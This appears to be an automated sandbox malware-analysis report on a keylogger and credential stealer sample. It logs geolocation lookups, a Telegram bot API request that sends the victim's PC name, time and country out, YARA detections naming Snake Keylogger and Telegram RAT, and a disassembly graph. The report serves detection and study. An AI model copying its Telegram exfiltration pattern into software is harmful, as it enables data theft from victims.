                                                                                    2024-10-07 13:32:13 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-07 13:32:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.749705188.114.97.34436492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-07 13:32:14 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-07 13:32:14 UTC674INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:14 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 64269
                                                                                    Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rUt3Fai9%2BvCCh%2BxIJEZkRHeMnj9R0qxGzawi7XIT87P3jZE1t7tzgwphYvOb7fx771G5rlu8bLIY05zO0NZvlKi9fJDkwHliFgovSpfwTZlHeNwKXgbcvW3hJ6RGV6Hbl8K946Zd"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cee418d3e535e6d-EWR
                                                                                    2024-10-07 13:32:14 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-07 13:32:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.749707188.114.97.34436492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-07 13:32:15 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-10-07 13:32:15 UTC674INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:15 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 64270
                                                                                    Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y8ZlRodq43f0EneKnktrw0XV7Kwj0afnQgtGO7dmApTioERFA8i22zVbO4LY2I9DbhSk%2FMi2VKWlpcISBSYky54MErdP61Bd%2FF1A0u17ZjGOoRY9HANDMmI9ZoQlHKZU02eKCfkC"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cee41949b83199d-EWR
                                                                                    2024-10-07 13:32:15 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-07 13:32:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.749709188.114.97.34436492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-07 13:32:16 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-10-07 13:32:17 UTC708INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:17 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 64272
                                                                                    Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rcxzLDrX6lDoGuLlBH7%2FJ8B1UAOWeO4a6gPZajyDMjmW2wPo7Wr0ltsj67T42hYBdRyNOLkXFzlo2Fw8sEsEqTxyR39Q%2BYlK%2F4rxwjRYcP7eaDvvopHn498QPRlYdcVnt6USwt%2FQ"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cee419e793842e2-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-10-07 13:32:17 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-07 13:32:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.749711188.114.97.34436492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-07 13:32:18 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-10-07 13:32:18 UTC672INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:18 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 64273
                                                                                    Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t3qsBBHcOEztA8KKGWPO2WTSmbF8HSBWxAH5DfjVCqEaQzDKUJtuz3yiKKBecHry68rQ2w9sm%2BG10jJhSjZ5x1mv7r5SWvJMi5TpYRh3xoGyJHsQrqwzBEZsPE8sBaLe9hiMMJWM"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cee41a59f150f88-EWR
                                                                                    2024-10-07 13:32:18 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-07 13:32:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.749713188.114.97.34436492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-07 13:32:19 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-10-07 13:32:19 UTC674INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:19 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 64274
                                                                                    Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTxmlYsWamPRsRvbqijIWEKASIaiRkOj2KF8KnGyyy6DIYgYP%2BbD9VxipM7lkjrvIViLmQrggya5qyYJ1Bu0cTmK9nlNunVjqVcuW%2FnmBTkIGoLJ5ugOP6Rhnl99A4wfJqWNyg8z"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cee41ae88587c7e-EWR
                                                                                    2024-10-07 13:32:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-07 13:32:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.749716188.114.97.34436492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-07 13:32:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-07 13:32:21 UTC678INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:21 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 64276
                                                                                    Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GUS27hx%2FBgsN2UbUYhpa5%2FswtSZZUBU7t3OaGkRRB74MGAbote2l0CO6RtajLaGwNkfPLY4VfwjsDA%2BZrXVwUX8maqXzht0Y1sF1ZVszFxpN1Tmo1xM%2F1e8Jt1KNUzcVlbgJObcc"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cee41bbf8ad8c6b-EWR
                                                                                    2024-10-07 13:32:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-07 13:32:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.749722149.154.167.2204436492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-07 13:32:22 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:27:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                    Host: api.telegram.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-07 13:32:23 UTC344INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 07 Oct 2024 13:32:23 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 55
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2024-10-07 13:32:23 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:09:32:07
                                                                                    Start date:07/10/2024
                                                                                    Path:C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\z1PO7311145.exe"
                                                                                    Imagebase:0xb30000
                                                                                    File size:276'992 bytes
                                                                                    MD5 hash:B9A13749CC0659A2076AFCA8F7474509
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:16.4%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:74.5%
                                                                                      Total number of Nodes:55
                                                                                      Total number of Limit Nodes:9
                                                                                      execution_graph 19279 2dae018 19280 2dae024 19279->19280 19291 6b3295a 19280->19291 19298 6b32968 19280->19298 19281 2dae0c3 19304 6b3de00 19281->19304 19308 6b3ddff 19281->19308 19312 6b3ddf1 19281->19312 19282 2dae0e6 19316 6b3fc5e 19282->19316 19320 6b3fc68 19282->19320 19283 2dae61f 19292 6b32928 19291->19292 19293 6b32962 19291->19293 19294 6b32a56 19293->19294 19324 6b39328 19293->19324 19328 6b39548 19293->19328 19334 6b3992c 19293->19334 19294->19281 19299 6b3298a 19298->19299 19300 6b32a56 19299->19300 19301 6b39548 2 API calls 19299->19301 19302 6b39328 LdrInitializeThunk 19299->19302 19303 6b3992c 2 API calls 19299->19303 19300->19281 19301->19300 19302->19300 19303->19300 19305 6b3de22 19304->19305 19306 6b39548 2 API calls 19305->19306 19307 6b3deec 19305->19307 19306->19307 19307->19282 19309 6b3de22 19308->19309 19310 6b39548 2 API calls 19309->19310 19311 6b3deec 19309->19311 19310->19311 19311->19282 19313 6b3de34 19312->19313 19314 6b39548 2 API calls 19313->19314 19315 6b3deec 19313->19315 19314->19315 19315->19282 19317 6b3fc8a 19316->19317 19318 6b39548 2 API calls 19317->19318 19319 6b3fd3a 19317->19319 19318->19319 19319->19283 19321 6b3fc8a 19320->19321 19322 6b39548 2 API calls 19321->19322 19323 6b3fd3a 19321->19323 19322->19323 19323->19283 19325 6b3933a 19324->19325 19327 6b3933f 19324->19327 19325->19294 19326 6b39a69 LdrInitializeThunk 19326->19325 19327->19325 19327->19326 19333 6b39579 19328->19333 19329 6b396d9 19329->19294 19330 6b39924 LdrInitializeThunk 19330->19329 19332 6b39328 LdrInitializeThunk 19332->19333 19333->19329 19333->19330 19333->19332 19338 6b397e3 19334->19338 19335 6b39924 LdrInitializeThunk 19337 6b39a81 19335->19337 19337->19294 19338->19335 19339 6b39328 LdrInitializeThunk 19338->19339 19339->19338 19340 6b39c70 19341 6b39c9d 19340->19341 19342 6b39328 LdrInitializeThunk 19341->19342 19343 6b3bb7f 19341->19343 19345 6b39fa6 19341->19345 19342->19345 19344 6b39328 LdrInitializeThunk 19344->19345 19345->19343 19345->19344

                                                                                      Executed Functions

                                                                                      Function 02DA7118 Relevance: 6.6, Strings: 5, Instructions: 350COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 258 2da7118-2da713b 259 2da713d-2da7143 258->259 260 2da7146-2da7166 258->260 259->260 263 2da7168 260->263 264 2da716d-2da7174 260->264 265 2da74fc 263->265 266 2da7176-2da7181 264->266 267 2da74fd-2da7505 265->267 268 2da750d-2da7519 266->268 269 2da7187-2da719a 266->269 272 2da751b-2da7521 268->272 273 2da74f5-2da74fa 268->273 274 2da719c-2da71aa 269->274 275 2da71b0-2da71cb 269->275 272->267 276 2da7523-2da7549 272->276 273->265 277 2da748d-2da748f 273->277 274->275 282 2da7484-2da748b 274->282 284 2da71ef-2da71f2 275->284 285 2da71cd-2da71d3 275->285 287 2da754b-2da7550 276->287 288 2da7552-2da7556 276->288 280 2da749e-2da74a4 277->280 281 2da7491-2da7496 277->281 280->268 286 2da74a6-2da74ab 280->286 281->280 282->265 282->277 291 2da71f8-2da71fb 284->291 292 2da734c-2da7352 284->292 289 2da71dc-2da71df 285->289 290 2da71d5 285->290 293 2da74ad-2da74b2 286->293 294 2da74f0-2da74f3 286->294 295 2da755c-2da755d 287->295 288->295 297 2da7212-2da7218 289->297 298 2da71e1-2da71e4 289->298 290->289 290->292 296 2da743e-2da7441 290->296 290->297 291->292 301 2da7201-2da7207 291->301 292->296 300 2da7358-2da735d 292->300 299 2da7508 293->299 302 2da74b4 293->302 294->273 294->299 296->299 307 2da7447-2da744d 296->307 308 2da721a-2da721c 297->308 309 2da721e-2da7220 297->309 303 2da71ea 298->303 304 2da727e-2da7284 298->304 299->268 300->296 301->292 305 2da720d 301->305 306 2da74bb-2da74c0 302->306 303->296 304->296 310 2da728a-2da7290 304->310 305->296 311 2da74e2-2da74e4 306->311 312 2da74c2-2da74c4 306->312 313 2da744f-2da7457 307->313 314 2da7472-2da7476 307->314 315 2da722a-2da7233 308->315 309->315 323 2da7292-2da7294 310->323 324 2da7296-2da7298 310->324 311->299 322 2da74e6-2da74e9 311->322 316 2da74d3-2da74d9 312->316 317 2da74c6-2da74cb 312->317 313->268 318 2da745d-2da746c 313->318 314->282 321 2da7478-2da747e 314->321 319 2da7246-2da726e 315->319 320 2da7235-2da7240 315->320 316->268 326 2da74db-2da74e0 316->326 317->316 318->275 318->314 338 2da7362-2da7398 319->338 339 2da7274-2da7279 319->339 320->296 320->319 321->266 321->282 322->294 325 2da72a2-2da72b9 323->325 324->325 332 2da72bb-2da72d4 325->332 333 2da72e4-2da730b 325->333 326->311 328 2da74b6-2da74b9 326->328 328->299 328->306 332->338 343 2da72da-2da72df 332->343 333->299 342 2da7311-2da7314 333->342 346 2da739a-2da739e 338->346 347 2da73a5-2da73ad 338->347 339->338 342->299 345 2da731a-2da7343 342->345 343->338 345->338 362 2da7345-2da734a 345->362 349 2da73bd-2da73c1 346->349 350 2da73a0-2da73a3 346->350 347->299 348 2da73b3-2da73b8 347->348 348->296 352 2da73c3-2da73c9 349->352 353 2da73e0-2da73e4 349->353 350->347 350->349 352->353 354 2da73cb-2da73d3 352->354 355 2da73ee-2da740d call 2da76f1 353->355 356 2da73e6-2da73ec 353->356 354->299 358 2da73d9-2da73de 354->358 359 2da7413-2da7417 355->359 356->355 356->359 358->296 359->296 360 2da7419-2da7435 359->360 360->296 362->338
                                                                                      Strings
                                                                                      Memory Dump Source
